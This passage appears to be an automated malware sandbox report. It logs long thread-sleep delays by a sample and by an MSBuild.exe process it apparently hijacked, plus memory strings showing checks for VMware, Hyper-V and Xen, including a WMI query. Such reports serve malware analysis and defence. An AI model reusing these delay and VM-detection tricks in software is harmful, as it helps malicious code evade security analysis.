Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe TID: 5504	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe TID: 6300	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe TID: 5840	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep count: 32 > 30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -29514790517935264s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6324	Thread sleep count: 1631 > 30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6324	Thread sleep count: 8217 > 30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599451s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599343s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -599016s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -598891s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -598766s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -598656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -598547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -598437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -598328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -598213s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -598094s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597984s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597656s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597218s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -597000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -596890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -596781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -596672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -596562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -596453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -596344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -596234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -596124s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -595837s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -595719s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -595609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -594251s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -594125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -594015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -593906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -593797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -593687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -593577s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -593468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -593359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -593245s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 6308	Thread sleep time: -593125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep count: 31 > 30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -28592453314249787s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -600000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599875s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 4304	Thread sleep count: 1396 > 30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 4304	Thread sleep count: 8462 > 30
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599765s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599651s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599547s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599437s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599328s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599215s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599109s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -599000s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598890s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598781s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598672s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598562s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598453s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598344s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598234s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598125s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -598015s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597906s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597797s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597687s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597578s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597468s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597359s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597250s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597140s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -597031s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596922s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596812s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596703s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596594s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596484s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596375s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596265s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596156s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -596047s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595937s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595828s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595718s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595609s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595499s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595390s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595281s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595171s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -595062s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -594953s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -594843s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -594734s >= -30000s
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe TID: 5352	Thread sleep time: -594625s >= -30000s

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Pnihosiyvr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\sssssssssssssssss.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599781
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599451
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599343
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599234
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599016
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598891
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598766
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598656
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598437
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598213
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598094
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597984
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597656
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597437
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597218
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597109
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596781
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596453
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596344
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596234
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596124
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595837
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595719
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595609
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594251
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593906
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593797
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593687
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593577
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593468
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593359
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593245
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 593125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 600000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599875
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599765
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599651
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599547
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599437
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599215
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599109
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 599000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598890
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598781
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598672
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598453
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598344
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598234
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598125
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 598015
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597906
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597797
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597687
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597578
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597468
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597359
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597250
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597140
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 597031
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596922
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596812
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596703
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596594
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596484
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596375
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596265
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596156
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 596047
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595937
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595828
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595718
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595609
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595499
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595390
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595281
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595171
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 595062
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594953
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594843
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594734
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe	Thread delayed: delay time: 594625

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: MSBuild.exe, 0000000D.00000002.3233871495.00000161F9996000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldel.
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr	Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
Source: Amcache.hve.6.dr	Binary or memory string: Ascsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: .Z$c:/windows/system32/drivers/vmci.sys
Source: MSBuild.exe, 0000000C.00000002.3069095152.000001837026B000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: pci\ven_15ad&dev_0740&subsys_074015ad,pci\ven_15ad&dev_0740,root\vmwvmcihostdev
Source: Amcache.hve.6.dr	Binary or memory string: c:/windows/system32/drivers/vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/4&224f42ef&0&000000
Source: Pnihosiyvr.exe, 00000000.00000002.2325744683.000001A32B13E000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 00000003.00000002.2517889557.000002592A3CB000.00000004.00000020.00020000.00000000.sdmp, sssssssssssssssss.exe, 0000000B.00000002.2864449375.0000020AF52CC000.00000004.00000020.00020000.00000000.sdmp, MSBuild.exe, 0000000C.00000002.3062146427.0000018355E4D000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: Amcache.hve.6.dr	Binary or memory string: vmci.sys
Source: Amcache.hve.6.dr	Binary or memory string: VMware-56 4d 43 71 48 15 3d ed-ae e6 c7 5a ec d9 3b f0
Source: Amcache.hve.6.dr	Binary or memory string: vmci.syshbin`
Source: Amcache.hve.6.dr	Binary or memory string: \driver\vmci,\driver\pci
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/4&1656f219&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware20,1
Source: sssssssssssssssss.exe, 0000000B.00000002.2853021181.0000020A80078000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: SerialNumber0VMware\|VIRTUAL\|A M I\|XenDselect * from Win32_ComputerSystem
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
